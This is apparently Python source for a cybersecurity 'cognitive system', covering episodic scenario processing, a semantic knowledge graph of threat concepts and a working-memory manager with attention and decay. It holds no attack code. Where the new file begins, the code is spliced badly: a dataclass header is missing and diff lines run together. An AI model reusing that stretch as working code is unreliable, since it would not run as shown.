            scenario_memory = MemoryEntry(
                memory_type=MemoryType.EPISODIC,
                content=scenario,
                importance=0.8,
                tags={"scenario", "complex", "cybersecurity"}
            )
            results["results"]["memory_id"] = await self.memory_manager.store_memory(scenario_memory)

            # 2) Strategic scenarios additionally get a long-term plan.
            needs_plan = scenario.get("type") == "strategic" or scenario.get("requires_planning", False)
            if needs_plan:
                results["results"]["plan_id"] = await self.strategic_planner.create_strategic_plan(
                    title=scenario.get("title", f"Scenario {scenario_id}"),
                    primary_goal=scenario.get("objective", "Complete cybersecurity scenario"),
                    template_type=scenario.get("template", "cybersecurity_assessment")
                )

            # 3) Analyze the scenario under each requested reasoning type.
            reasoning_results = {}
            for reasoning_type in scenario.get("reasoning_types", [ReasoningType.DEDUCTIVE]):
                chain_id = await self.reasoning_engine.start_reasoning_chain(
                    topic=f"Scenario Analysis: {scenario.get('title', scenario_id)}",
                    goal="Analyze and understand the cybersecurity scenario",
                    reasoning_type=reasoning_type
                )

                for detail in scenario.get("details", []):
                    await self.reasoning_engine.add_reasoning_step(
                        chain_id,
                        detail,
                        "scenario_analysis",
                        scenario.get("evidence", [])
                    )

                finished = await self.reasoning_engine.complete_reasoning_chain(chain_id)
                reasoning_results[reasoning_type.value] = {
                    "chain_id": chain_id,
                    "conclusion": finished.conclusion if finished else "Failed to complete",
                    "confidence": finished.confidence if finished else 0.0
                }

            results["results"]["reasoning"] = reasoning_results

            # 4) Derive actionable recommendations from the analysis.
            recommendations = await self._generate_recommendations(scenario, reasoning_results)
            results["results"]["recommendations"] = recommendations

            # 5) Persist the distilled insight as semantic memory.
            insight_memory = MemoryEntry(
                memory_type=MemoryType.SEMANTIC,
                content={
                    "type": "scenario_insight",
                    "scenario_id": scenario_id,
                    "key_learnings": recommendations,
                    "confidence_scores": {k: v["confidence"] for k, v in reasoning_results.items()}
                },
                importance=0.7,
                tags={"insight", "learning", "cybersecurity"}
            )
            await self.memory_manager.store_memory(insight_memory)

            results["status"] = "success"
            self.logger.info(f"Successfully processed scenario: {scenario_id}")

        except Exception as e:
            results["status"] = "error"
            results["error"] = str(e)
            self.logger.error(f"Error processing scenario {scenario_id}: {e}")

        return results

    async def _generate_recommendations(self, scenario: Dict[str, Any],
                                        reasoning_results: Dict[str, Any]) -> List[str]:
        """Produce up to ten recommendations from scenario type, reasoning, and past cases."""
        scenario_type = scenario.get("type", "general")

        # Baseline recommendations per scenario category.
        if scenario_type == "vulnerability_assessment":
            recommendations = [
                "Conduct comprehensive vulnerability scan",
                "Prioritize critical vulnerabilities for immediate remediation",
                "Implement security patches and updates",
                "Establish regular vulnerability monitoring"
            ]
        elif scenario_type == "incident_response":
            recommendations = [
                "Immediately contain the security incident",
                "Preserve forensic evidence",
                "Assess scope and impact of the incident",
                "Implement recovery procedures",
                "Conduct post-incident analysis"
            ]
        elif scenario_type == "penetration_testing":
            recommendations = [
                "Define clear scope and objectives",
                "Follow structured testing methodology",
                "Document all findings and evidence",
                "Provide actionable remediation guidance"
            ]
        else:
            recommendations = [
                "Assess current security posture",
                "Identify key risk areas",
                "Develop mitigation strategies",
                "Implement monitoring and detection"
            ]

        # High-confidence reasoning outcomes get their own recommendation.
        for reasoning_type, results in reasoning_results.items():
            if results["confidence"] > 0.7:
                recommendations.append(f"High confidence in {reasoning_type} analysis suggests prioritizing related actions")

        # Leverage similar past episodes, if any exist.
        similar_memories = await self.memory_manager.search_memories(
            scenario.get("title", ""), [MemoryType.EPISODIC], limit=3
        )
        if similar_memories:
            recommendations.append(f"Apply lessons learned from {len(similar_memories)} similar past scenarios")

        return recommendations[:10]  # Limit to top 10 recommendations

# Factory function for easy instantiation
def create_persistent_cognitive_system(db_path: str = "data/cognitive_system.db") -> PersistentCognitiveSystem:
    """Create and initialize the persistent cognitive system"""
    return PersistentCognitiveSystem(db_path)

# Main execution for testing
if __name__ == "__main__":
    import asyncio

    # Configure logging
    logging.basicConfig(
        level=logging.INFO,
        format='%(asctime)s - %(name)s - %(levelname)s - %(message)s'
    )

    async def test_system():
        """Test the persistent cognitive system"""
        system = create_persistent_cognitive_system()

        test_scenario = {
            "type": "vulnerability_assessment",
            "title": "Web Application Security Assessment",
            "objective": "Assess security posture of critical web application",
            "details": [
                "Web application handles sensitive customer data",
                "Application has not been tested in 12 months",
                "Recent security incidents in similar applications reported"
            ],
            "evidence": [
                "Previous vulnerability scan results",
                "Security incident reports from industry",
                "Application architecture documentation"
            ],
            "reasoning_types": [ReasoningType.DEDUCTIVE, ReasoningType.CAUSAL],
            "requires_planning": True,
            "template": "cybersecurity_assessment"
        }

        results = await system.process_complex_scenario(test_scenario)

        print("=== Persistent Cognitive System Test Results ===")
        print(json.dumps(results, indent=2, default=str))

        memories = await system.memory_manager.search_memories("vulnerability", limit=5)
        print(f"\n=== Found {len(memories)} memories related to 'vulnerability' ===")

        for memory in memories:
            print(f"- {memory.memory_id}: {memory.content.get('type', 'Unknown')} (importance: {memory.importance:.2f})")

    asyncio.run(test_system())

# ---------------------------------------------------------------------------
# NOTE(review): the patch introduces a NEW file below this point:
#   src/cognitive/semantic_memory.py
# ---------------------------------------------------------------------------
"""
Semantic Memory Networks with Knowledge Graphs for Cybersecurity Concepts
Implements concept relationships and knowledge reasoning
"""
import sqlite3
import json
import uuid
import networkx as nx
from datetime import datetime
from typing import Dict, List, Any, Optional, Tuple, Set
from dataclasses import dataclass, asdict
import logging
from pathlib import Path
import pickle

logger = logging.getLogger(__name__)
concept_type: str # vulnerability, technique, tool, indicator, etc. + description: str + properties: Dict[str, Any] + confidence: float + created_at: datetime + updated_at: datetime + source: str # mitre, cve, custom, etc. + +@dataclass +class ConceptRelation: + """Relationship between semantic concepts""" + id: str + source_concept_id: str + target_concept_id: str + relation_type: str # uses, mitigates, exploits, indicates, etc. + strength: float + properties: Dict[str, Any] + created_at: datetime + evidence: List[str] + +class SemanticMemoryNetwork: + """Advanced semantic memory with knowledge graph capabilities""" + + def __init__(self, db_path: str = "data/cognitive/semantic_memory.db"): + """Initialize semantic memory system""" + self.db_path = Path(db_path) + self.db_path.parent.mkdir(parents=True, exist_ok=True) + self._init_database() + self._knowledge_graph = nx.MultiDiGraph() + self._concept_cache = {} + self._load_knowledge_graph() + + def _init_database(self): + """Initialize database schemas""" + with sqlite3.connect(self.db_path) as conn: + conn.execute(""" + CREATE TABLE IF NOT EXISTS semantic_concepts ( + id TEXT PRIMARY KEY, + name TEXT NOT NULL, + concept_type TEXT NOT NULL, + description TEXT, + properties TEXT, + confidence REAL DEFAULT 0.5, + source TEXT, + created_at TEXT DEFAULT CURRENT_TIMESTAMP, + updated_at TEXT DEFAULT CURRENT_TIMESTAMP + ) + """) + + conn.execute(""" + CREATE TABLE IF NOT EXISTS concept_relations ( + id TEXT PRIMARY KEY, + source_concept_id TEXT, + target_concept_id TEXT, + relation_type TEXT NOT NULL, + strength REAL DEFAULT 0.5, + properties TEXT, + evidence TEXT, + created_at TEXT DEFAULT CURRENT_TIMESTAMP, + FOREIGN KEY (source_concept_id) REFERENCES semantic_concepts(id), + FOREIGN KEY (target_concept_id) REFERENCES semantic_concepts(id) + ) + """) + + conn.execute(""" + CREATE TABLE IF NOT EXISTS knowledge_queries ( + id TEXT PRIMARY KEY, + query_text TEXT NOT NULL, + query_type TEXT, + concepts_used TEXT, + 
relations_used TEXT, + result TEXT, + confidence REAL, + timestamp TEXT DEFAULT CURRENT_TIMESTAMP + ) + """) + + conn.execute(""" + CREATE TABLE IF NOT EXISTS concept_clusters ( + id TEXT PRIMARY KEY, + cluster_name TEXT NOT NULL, + concept_ids TEXT, + cluster_properties TEXT, + created_at TEXT DEFAULT CURRENT_TIMESTAMP + ) + """) + + # Create indices for performance + conn.execute("CREATE INDEX IF NOT EXISTS idx_concept_name ON semantic_concepts(name)") + conn.execute("CREATE INDEX IF NOT EXISTS idx_concept_type ON semantic_concepts(concept_type)") + conn.execute("CREATE INDEX IF NOT EXISTS idx_relation_type ON concept_relations(relation_type)") + conn.execute("CREATE INDEX IF NOT EXISTS idx_relation_source ON concept_relations(source_concept_id)") + conn.execute("CREATE INDEX IF NOT EXISTS idx_relation_target ON concept_relations(target_concept_id)") + + def add_concept(self, name: str, concept_type: str, description: str = "", + properties: Dict[str, Any] = None, confidence: float = 0.5, + source: str = "custom") -> str: + """Add a new semantic concept to the knowledge graph""" + try: + concept_id = str(uuid.uuid4()) + + concept = SemanticConcept( + id=concept_id, + name=name, + concept_type=concept_type, + description=description, + properties=properties or {}, + confidence=confidence, + created_at=datetime.now(), + updated_at=datetime.now(), + source=source + ) + + with sqlite3.connect(self.db_path) as conn: + conn.execute(""" + INSERT INTO semantic_concepts ( + id, name, concept_type, description, properties, + confidence, source, created_at, updated_at + ) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?) 
+ """, ( + concept.id, concept.name, concept.concept_type, + concept.description, json.dumps(concept.properties), + concept.confidence, concept.source, + concept.created_at.isoformat(), + concept.updated_at.isoformat() + )) + + # Add to knowledge graph + self._knowledge_graph.add_node( + concept_id, + name=name, + concept_type=concept_type, + description=description, + properties=concept.properties, + confidence=confidence + ) + + # Cache the concept + self._concept_cache[concept_id] = concept + + logger.info(f"Added semantic concept: {name} ({concept_type})") + return concept_id + + except Exception as e: + logger.error(f"Error adding concept: {e}") + return "" + + def add_relation(self, source_concept_id: str, target_concept_id: str, + relation_type: str, strength: float = 0.5, + properties: Dict[str, Any] = None, + evidence: List[str] = None) -> str: + """Add a relationship between concepts""" + try: + relation_id = str(uuid.uuid4()) + + relation = ConceptRelation( + id=relation_id, + source_concept_id=source_concept_id, + target_concept_id=target_concept_id, + relation_type=relation_type, + strength=strength, + properties=properties or {}, + created_at=datetime.now(), + evidence=evidence or [] + ) + + with sqlite3.connect(self.db_path) as conn: + conn.execute(""" + INSERT INTO concept_relations ( + id, source_concept_id, target_concept_id, relation_type, + strength, properties, evidence, created_at + ) VALUES (?, ?, ?, ?, ?, ?, ?, ?) 
+ """, ( + relation.id, relation.source_concept_id, + relation.target_concept_id, relation.relation_type, + relation.strength, json.dumps(relation.properties), + json.dumps(relation.evidence), + relation.created_at.isoformat() + )) + + # Add to knowledge graph + self._knowledge_graph.add_edge( + source_concept_id, + target_concept_id, + relation_id=relation_id, + relation_type=relation_type, + strength=strength, + properties=relation.properties + ) + + logger.info(f"Added relation: {relation_type} ({strength:.2f})") + return relation_id + + except Exception as e: + logger.error(f"Error adding relation: {e}") + return "" + + def find_concept(self, name: str = "", concept_type: str = "", + properties: Dict[str, Any] = None) -> List[SemanticConcept]: + """Find concepts matching criteria""" + try: + with sqlite3.connect(self.db_path) as conn: + conditions = [] + params = [] + + if name: + conditions.append("name LIKE ?") + params.append(f"%{name}%") + + if concept_type: + conditions.append("concept_type = ?") + params.append(concept_type) + + where_clause = " AND ".join(conditions) if conditions else "1=1" + + cursor = conn.execute(f""" + SELECT * FROM semantic_concepts + WHERE {where_clause} + ORDER BY confidence DESC, name + """, params) + + concepts = [] + for row in cursor.fetchall(): + concept = SemanticConcept( + id=row[0], + name=row[1], + concept_type=row[2], + description=row[3] or "", + properties=json.loads(row[4]) if row[4] else {}, + confidence=row[5], + created_at=datetime.fromisoformat(row[7]), + updated_at=datetime.fromisoformat(row[8]), + source=row[6] or "unknown" + ) + + # Filter by properties if specified + if properties: + matches = all( + concept.properties.get(k) == v + for k, v in properties.items() + ) + if matches: + concepts.append(concept) + else: + concepts.append(concept) + + logger.info(f"Found {len(concepts)} matching concepts") + return concepts + + except Exception as e: + logger.error(f"Error finding concepts: {e}") + return [] + + 
def reason_about_threat(self, threat_indicators: List[str]) -> Dict[str, Any]: + """Perform knowledge-based reasoning about a potential threat""" + try: + reasoning_result = { + 'indicators': threat_indicators, + 'matched_concepts': [], + 'inferred_relations': [], + 'threat_assessment': {}, + 'recommendations': [], + 'confidence': 0.0 + } + + # Find concepts matching the indicators + matched_concepts = [] + for indicator in threat_indicators: + concepts = self.find_concept(name=indicator) + matched_concepts.extend(concepts) + + reasoning_result['matched_concepts'] = [ + { + 'id': c.id, + 'name': c.name, + 'type': c.concept_type, + 'confidence': c.confidence + } for c in matched_concepts + ] + + # Calculate overall threat confidence + if matched_concepts: + avg_confidence = sum(c.confidence for c in matched_concepts) / len(matched_concepts) + reasoning_result['confidence'] = min(avg_confidence, 1.0) + + # Generate threat assessment based on concept types + threat_types = {} + for concept in matched_concepts: + if concept.concept_type not in threat_types: + threat_types[concept.concept_type] = 0 + threat_types[concept.concept_type] += concept.confidence + + if 'vulnerability' in threat_types and 'technique' in threat_types: + reasoning_result['threat_assessment']['risk_level'] = 'HIGH' + reasoning_result['threat_assessment']['rationale'] = 'Vulnerability and attack technique combination detected' + elif 'malware' in threat_types or 'exploit' in threat_types: + reasoning_result['threat_assessment']['risk_level'] = 'MEDIUM' + reasoning_result['threat_assessment']['rationale'] = 'Malicious indicators present' + else: + reasoning_result['threat_assessment']['risk_level'] = 'LOW' + reasoning_result['threat_assessment']['rationale'] = 'Limited threat indicators' + + logger.info(f"Threat reasoning complete: {reasoning_result['threat_assessment']['risk_level']} risk") + return reasoning_result + + except Exception as e: + logger.error(f"Error in threat reasoning: {e}") + 
return {'error': str(e)} + + def _load_knowledge_graph(self): + """Load knowledge graph from database""" + try: + with sqlite3.connect(self.db_path) as conn: + # Load concepts + cursor = conn.execute("SELECT * FROM semantic_concepts") + for row in cursor.fetchall(): + concept_id = row[0] + self._knowledge_graph.add_node( + concept_id, + name=row[1], + concept_type=row[2], + description=row[3] or "", + properties=json.loads(row[4]) if row[4] else {}, + confidence=row[5] + ) + + # Load relations + cursor = conn.execute("SELECT * FROM concept_relations") + for row in cursor.fetchall(): + self._knowledge_graph.add_edge( + row[1], # source_concept_id + row[2], # target_concept_id + relation_id=row[0], + relation_type=row[3], + strength=row[4], + properties=json.loads(row[5]) if row[5] else {} + ) + + logger.info(f"Loaded knowledge graph: {self._knowledge_graph.number_of_nodes()} nodes, {self._knowledge_graph.number_of_edges()} edges") + + except Exception as e: + logger.error(f"Error loading knowledge graph: {e}") + + def _store_knowledge_query(self, query_text: str, query_type: str, + concepts_used: List[str], relations_used: List[str], + result: Dict[str, Any], confidence: float): + """Store knowledge query for learning""" + try: + query_id = str(uuid.uuid4()) + + with sqlite3.connect(self.db_path) as conn: + conn.execute(""" + INSERT INTO knowledge_queries ( + id, query_text, query_type, concepts_used, + relations_used, result, confidence + ) VALUES (?, ?, ?, ?, ?, ?, ?) 
+ """, ( + query_id, query_text, query_type, + json.dumps(concepts_used), json.dumps(relations_used), + json.dumps(result), confidence + )) + + except Exception as e: + logger.error(f"Error storing knowledge query: {e}") + + def get_semantic_statistics(self) -> Dict[str, Any]: + """Get comprehensive semantic memory statistics""" + try: + with sqlite3.connect(self.db_path) as conn: + stats = {} + + # Basic counts + cursor = conn.execute("SELECT COUNT(*) FROM semantic_concepts") + stats['total_concepts'] = cursor.fetchone()[0] + + cursor = conn.execute("SELECT COUNT(*) FROM concept_relations") + stats['total_relations'] = cursor.fetchone()[0] + + # Concept type distribution + cursor = conn.execute(""" + SELECT concept_type, COUNT(*) + FROM semantic_concepts + GROUP BY concept_type + """) + stats['concept_types'] = dict(cursor.fetchall()) + + # Relation type distribution + cursor = conn.execute(""" + SELECT relation_type, COUNT(*) + FROM concept_relations + GROUP BY relation_type + """) + stats['relation_types'] = dict(cursor.fetchall()) + + return stats + + except Exception as e: + logger.error(f"Error getting semantic statistics: {e}") + return {'error': str(e)} + +# Export the main classes +__all__ = ['SemanticMemoryNetwork', 'SemanticConcept', 'ConceptRelation'] diff --git a/src/cognitive/working_memory.py b/src/cognitive/working_memory.py new file mode 100644 index 0000000000000000000000000000000000000000..aa50384214020bb4b0e744f98ecb8143af1707da --- /dev/null +++ b/src/cognitive/working_memory.py @@ -0,0 +1,627 @@ +""" +Working Memory Management System with Attention-based Focus and Context Switching +Implements dynamic attention mechanisms and context management for cognitive agents +""" +import sqlite3 +import json +import uuid +from datetime import datetime, timedelta +from typing import Dict, List, Any, Optional, Tuple +from dataclasses import dataclass, asdict +import logging +from pathlib import Path +import heapq +import threading +import time + +logger = 
logging.getLogger(__name__) + +@dataclass +class WorkingMemoryItem: + """Individual item in working memory""" + id: str + content: str + item_type: str # goal, observation, hypothesis, plan, etc. + priority: float # 0.0-1.0, higher is more important + activation_level: float # 0.0-1.0, current activation + created_at: datetime + last_accessed: datetime + access_count: int + decay_rate: float # how quickly activation decays + context_tags: List[str] + source_agent: str + related_items: List[str] # IDs of related items + +@dataclass +class AttentionFocus: + """Current attention focus with weighted priorities""" + focus_id: str + focus_type: str # task, threat, goal, etc. + focus_items: List[str] # Working memory item IDs + attention_weight: float # 0.0-1.0 + duration: timedelta + created_at: datetime + metadata: Dict[str, Any] + +class WorkingMemoryManager: + """Advanced working memory with attention-based focus management""" + + def __init__(self, db_path: str = "data/cognitive/working_memory.db", + capacity: int = 50, decay_interval: float = 30.0): + """Initialize working memory system""" + self.db_path = Path(db_path) + self.db_path.parent.mkdir(parents=True, exist_ok=True) + self.capacity = capacity # Maximum items in working memory + self.decay_interval = decay_interval # Seconds between decay updates + + self._init_database() + self._memory_items = {} # In-memory cache + self._attention_focus = None + self._attention_history = [] + + # Start background decay process + self._decay_thread = threading.Thread(target=self._decay_loop, daemon=True) + self._decay_running = True + self._decay_thread.start() + + # Load existing items + self._load_working_memory() + + def _init_database(self): + """Initialize database schemas""" + with sqlite3.connect(self.db_path) as conn: + conn.execute(""" + CREATE TABLE IF NOT EXISTS working_memory_items ( + id TEXT PRIMARY KEY, + content TEXT NOT NULL, + item_type TEXT NOT NULL, + priority REAL NOT NULL, + activation_level REAL NOT 
NULL, + created_at TEXT NOT NULL, + last_accessed TEXT NOT NULL, + access_count INTEGER DEFAULT 0, + decay_rate REAL DEFAULT 0.1, + context_tags TEXT, + source_agent TEXT, + related_items TEXT, + updated_at TEXT DEFAULT CURRENT_TIMESTAMP + ) + """) + + conn.execute(""" + CREATE TABLE IF NOT EXISTS attention_focus_log ( + id TEXT PRIMARY KEY, + focus_type TEXT NOT NULL, + focus_items TEXT, + attention_weight REAL NOT NULL, + duration_seconds REAL, + created_at TEXT NOT NULL, + ended_at TEXT, + metadata TEXT, + agent_id TEXT + ) + """) + + conn.execute(""" + CREATE TABLE IF NOT EXISTS context_switches ( + id TEXT PRIMARY KEY, + from_focus TEXT, + to_focus TEXT, + switch_reason TEXT, + switch_cost REAL, + timestamp TEXT DEFAULT CURRENT_TIMESTAMP, + agent_id TEXT + ) + """) + + # Create indices + conn.execute("CREATE INDEX IF NOT EXISTS idx_wm_priority ON working_memory_items(priority DESC)") + conn.execute("CREATE INDEX IF NOT EXISTS idx_wm_activation ON working_memory_items(activation_level DESC)") + conn.execute("CREATE INDEX IF NOT EXISTS idx_wm_type ON working_memory_items(item_type)") + conn.execute("CREATE INDEX IF NOT EXISTS idx_wm_agent ON working_memory_items(source_agent)") + + def add_item(self, content: str, item_type: str, priority: float = 0.5, + source_agent: str = "", context_tags: List[str] = None) -> str: + """Add item to working memory with attention-based priority""" + try: + item_id = str(uuid.uuid4()) + + item = WorkingMemoryItem( + id=item_id, + content=content, + item_type=item_type, + priority=priority, + activation_level=priority, # Initial activation equals priority + created_at=datetime.now(), + last_accessed=datetime.now(), + access_count=0, + decay_rate=0.1, # Default decay rate + context_tags=context_tags or [], + source_agent=source_agent, + related_items=[] + ) + + # Check capacity and evict if necessary + if len(self._memory_items) >= self.capacity: + self._evict_lowest_activation() + + # Store in memory and database + 
self._memory_items[item_id] = item + self._store_item_to_db(item) + + # Update attention focus if this is high priority + if priority > 0.7 and (not self._attention_focus or + priority > self._attention_focus.attention_weight): + self._update_attention_focus(item_id, item_type, priority) + + logger.info(f"Added working memory item: {item_type} (priority: {priority:.2f})") + return item_id + + except Exception as e: + logger.error(f"Error adding working memory item: {e}") + return "" + + def get_item(self, item_id: str) -> Optional[WorkingMemoryItem]: + """Retrieve item from working memory and update activation""" + try: + if item_id in self._memory_items: + item = self._memory_items[item_id] + + # Update access statistics + item.last_accessed = datetime.now() + item.access_count += 1 + + # Boost activation on access (but cap at 1.0) + activation_boost = min(0.2, 1.0 - item.activation_level) + item.activation_level = min(1.0, item.activation_level + activation_boost) + + # Update in database + self._update_item_in_db(item) + + logger.debug(f"Retrieved working memory item: {item_id[:8]}...") + return item + + logger.warning(f"Working memory item not found: {item_id}") + return None + + except Exception as e: + logger.error(f"Error retrieving working memory item: {e}") + return None + + def get_active_items(self, min_activation: float = 0.3, + item_type: str = "", limit: int = 20) -> List[WorkingMemoryItem]: + """Get currently active items above activation threshold""" + try: + active_items = [] + + for item in self._memory_items.values(): + if (item.activation_level >= min_activation and + (not item_type or item.item_type == item_type)): + active_items.append(item) + + # Sort by activation level (highest first) + active_items.sort(key=lambda x: x.activation_level, reverse=True) + + logger.info(f"Retrieved {len(active_items[:limit])} active items") + return active_items[:limit] + + except Exception as e: + logger.error(f"Error getting active items: {e}") + return [] + 
+ def focus_attention(self, focus_type: str, item_ids: List[str], + attention_weight: float = 0.8, agent_id: str = "") -> str: + """Focus attention on specific items""" + try: + focus_id = str(uuid.uuid4()) + + # End current focus if exists + if self._attention_focus: + self._end_attention_focus() + + # Create new attention focus + new_focus = AttentionFocus( + focus_id=focus_id, + focus_type=focus_type, + focus_items=item_ids, + attention_weight=attention_weight, + duration=timedelta(0), + created_at=datetime.now(), + metadata={'agent_id': agent_id} + ) + + self._attention_focus = new_focus + + # Boost activation of focused items + for item_id in item_ids: + if item_id in self._memory_items: + item = self._memory_items[item_id] + item.activation_level = min(1.0, item.activation_level + 0.3) + self._update_item_in_db(item) + + # Store focus in database + self._store_attention_focus(new_focus) + + logger.info(f"Focused attention on {focus_type}: {len(item_ids)} items") + return focus_id + + except Exception as e: + logger.error(f"Error focusing attention: {e}") + return "" + + def switch_context(self, new_focus_type: str, new_item_ids: List[str], + switch_reason: str = "", agent_id: str = "") -> Dict[str, Any]: + """Switch attention context with cost calculation""" + try: + switch_result = { + 'switch_id': str(uuid.uuid4()), + 'from_focus': None, + 'to_focus': new_focus_type, + 'switch_cost': 0.0, + 'success': False + } + + # Calculate switch cost based on current focus + if self._attention_focus: + switch_result['from_focus'] = self._attention_focus.focus_type + + # Cost factors: + # 1. How long we've been in current focus + current_duration = datetime.now() - self._attention_focus.created_at + duration_cost = min(current_duration.total_seconds() / 300.0, 0.3) # Max 5min + + # 2. Number of active items being abandoned + abandoned_items = len(self._attention_focus.focus_items) + abandonment_cost = min(abandoned_items * 0.1, 0.4) + + # 3. 
Similarity between old and new focus + similarity_discount = self._calculate_focus_similarity( + self._attention_focus.focus_items, new_item_ids + ) + + total_cost = duration_cost + abandonment_cost - similarity_discount + switch_result['switch_cost'] = max(0.0, min(total_cost, 1.0)) + + # Record context switch + self._record_context_switch( + self._attention_focus.focus_type, + new_focus_type, + switch_reason, + switch_result['switch_cost'], + agent_id + ) + + # Perform the switch + focus_id = self.focus_attention(new_focus_type, new_item_ids, agent_id=agent_id) + switch_result['success'] = bool(focus_id) + + logger.info(f"Context switch: {switch_result['from_focus']} -> {new_focus_type} (cost: {switch_result['switch_cost']:.3f})") + return switch_result + + except Exception as e: + logger.error(f"Error switching context: {e}") + return {'error': str(e)} + + def get_current_focus(self) -> Optional[AttentionFocus]: + """Get current attention focus""" + return self._attention_focus + + def decay_memory(self): + """Apply decay to all working memory items""" + try: + decayed_count = 0 + evicted_items = [] + + for item_id, item in list(self._memory_items.items()): + # Apply decay based on time since last access + time_since_access = datetime.now() - item.last_accessed + decay_amount = item.decay_rate * (time_since_access.total_seconds() / 60.0) + + item.activation_level = max(0.0, item.activation_level - decay_amount) + decayed_count += 1 + + # Evict items with very low activation + if item.activation_level < 0.05: + evicted_items.append(item_id) + else: + # Update in database + self._update_item_in_db(item) + + # Remove evicted items + for item_id in evicted_items: + del self._memory_items[item_id] + self._remove_item_from_db(item_id) + + if evicted_items: + logger.info(f"Memory decay: {decayed_count} items decayed, {len(evicted_items)} evicted") + + except Exception as e: + logger.error(f"Error during memory decay: {e}") + + def find_related_items(self, item_id: str, 
max_items: int = 5) -> List[WorkingMemoryItem]: + """Find items related to the given item""" + try: + if item_id not in self._memory_items: + return [] + + source_item = self._memory_items[item_id] + related_items = [] + + for other_id, other_item in self._memory_items.items(): + if other_id == item_id: + continue + + # Calculate relatedness score + relatedness = 0.0 + + # Same type bonus + if source_item.item_type == other_item.item_type: + relatedness += 0.3 + + # Shared context tags + shared_tags = set(source_item.context_tags) & set(other_item.context_tags) + if shared_tags: + relatedness += len(shared_tags) * 0.2 + + # Same source agent + if source_item.source_agent == other_item.source_agent: + relatedness += 0.2 + + # Temporal proximity + time_diff = abs((source_item.created_at - other_item.created_at).total_seconds()) + if time_diff < 300: # Within 5 minutes + relatedness += 0.3 * (300 - time_diff) / 300 + + if relatedness > 0.1: # Minimum relatedness threshold + related_items.append((other_item, relatedness)) + + # Sort by relatedness and return top items + related_items.sort(key=lambda x: x[1], reverse=True) + + return [item for item, score in related_items[:max_items]] + + except Exception as e: + logger.error(f"Error finding related items: {e}") + return [] + + def _update_attention_focus(self, item_id: str, item_type: str, priority: float): + """Update current attention focus""" + if self._attention_focus: + self._end_attention_focus() + + self.focus_attention(item_type, [item_id], priority) + + def _end_attention_focus(self): + """End current attention focus""" + if self._attention_focus: + # Update duration + self._attention_focus.duration = datetime.now() - self._attention_focus.created_at + + # Add to history + self._attention_history.append(self._attention_focus) + + # Update in database + with sqlite3.connect(self.db_path) as conn: + conn.execute(""" + UPDATE attention_focus_log SET + ended_at = ?, + duration_seconds = ? + WHERE id = ? 
+ """, ( + datetime.now().isoformat(), + self._attention_focus.duration.total_seconds(), + self._attention_focus.focus_id + )) + + self._attention_focus = None + + def _evict_lowest_activation(self): + """Evict item with lowest activation to make space""" + if not self._memory_items: + return + + lowest_item_id = min( + self._memory_items.keys(), + key=lambda x: self._memory_items[x].activation_level + ) + + del self._memory_items[lowest_item_id] + self._remove_item_from_db(lowest_item_id) + + logger.debug(f"Evicted working memory item: {lowest_item_id[:8]}...") + + def _calculate_focus_similarity(self, items1: List[str], items2: List[str]) -> float: + """Calculate similarity between two sets of focus items""" + if not items1 or not items2: + return 0.0 + + set1 = set(items1) + set2 = set(items2) + + intersection = len(set1 & set2) + union = len(set1 | set2) + + return intersection / union if union > 0 else 0.0 + + def _record_context_switch(self, from_focus: str, to_focus: str, + reason: str, cost: float, agent_id: str): + """Record context switch in database""" + try: + switch_id = str(uuid.uuid4()) + + with sqlite3.connect(self.db_path) as conn: + conn.execute(""" + INSERT INTO context_switches ( + id, from_focus, to_focus, switch_reason, + switch_cost, agent_id + ) VALUES (?, ?, ?, ?, ?, ?) + """, (switch_id, from_focus, to_focus, reason, cost, agent_id)) + + except Exception as e: + logger.error(f"Error recording context switch: {e}") + + def _decay_loop(self): + """Background thread for memory decay""" + while self._decay_running: + try: + time.sleep(self.decay_interval) + self.decay_memory() + except Exception as e: + logger.error(f"Error in decay loop: {e}") + + def _load_working_memory(self): + """Load working memory items from database""" + try: + with sqlite3.connect(self.db_path) as conn: + cursor = conn.execute(""" + SELECT * FROM working_memory_items + ORDER BY activation_level DESC + LIMIT ? 
+ """, (self.capacity,)) + + for row in cursor.fetchall(): + item = WorkingMemoryItem( + id=row[0], + content=row[1], + item_type=row[2], + priority=row[3], + activation_level=row[4], + created_at=datetime.fromisoformat(row[5]), + last_accessed=datetime.fromisoformat(row[6]), + access_count=row[7], + decay_rate=row[8], + context_tags=json.loads(row[9]) if row[9] else [], + source_agent=row[10] or "", + related_items=json.loads(row[11]) if row[11] else [] + ) + self._memory_items[item.id] = item + + logger.info(f"Loaded {len(self._memory_items)} working memory items") + + except Exception as e: + logger.error(f"Error loading working memory: {e}") + + def _store_item_to_db(self, item: WorkingMemoryItem): + """Store item to database""" + try: + with sqlite3.connect(self.db_path) as conn: + conn.execute(""" + INSERT INTO working_memory_items ( + id, content, item_type, priority, activation_level, + created_at, last_accessed, access_count, decay_rate, + context_tags, source_agent, related_items + ) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?) + """, ( + item.id, item.content, item.item_type, item.priority, + item.activation_level, item.created_at.isoformat(), + item.last_accessed.isoformat(), item.access_count, + item.decay_rate, json.dumps(item.context_tags), + item.source_agent, json.dumps(item.related_items) + )) + + except Exception as e: + logger.error(f"Error storing item to database: {e}") + + def _update_item_in_db(self, item: WorkingMemoryItem): + """Update item in database""" + try: + with sqlite3.connect(self.db_path) as conn: + conn.execute(""" + UPDATE working_memory_items SET + activation_level = ?, last_accessed = ?, + access_count = ?, updated_at = CURRENT_TIMESTAMP + WHERE id = ? 
+ """, ( + item.activation_level, item.last_accessed.isoformat(), + item.access_count, item.id + )) + + except Exception as e: + logger.error(f"Error updating item in database: {e}") + + def _remove_item_from_db(self, item_id: str): + """Remove item from database""" + try: + with sqlite3.connect(self.db_path) as conn: + conn.execute("DELETE FROM working_memory_items WHERE id = ?", (item_id,)) + + except Exception as e: + logger.error(f"Error removing item from database: {e}") + + def _store_attention_focus(self, focus: AttentionFocus): + """Store attention focus in database""" + try: + with sqlite3.connect(self.db_path) as conn: + conn.execute(""" + INSERT INTO attention_focus_log ( + id, focus_type, focus_items, attention_weight, + created_at, metadata, agent_id + ) VALUES (?, ?, ?, ?, ?, ?, ?) + """, ( + focus.focus_id, focus.focus_type, + json.dumps(focus.focus_items), focus.attention_weight, + focus.created_at.isoformat(), json.dumps(focus.metadata), + focus.metadata.get('agent_id', '') + )) + + except Exception as e: + logger.error(f"Error storing attention focus: {e}") + + def get_working_memory_statistics(self) -> Dict[str, Any]: + """Get comprehensive working memory statistics""" + try: + with sqlite3.connect(self.db_path) as conn: + stats = { + 'current_capacity': len(self._memory_items), + 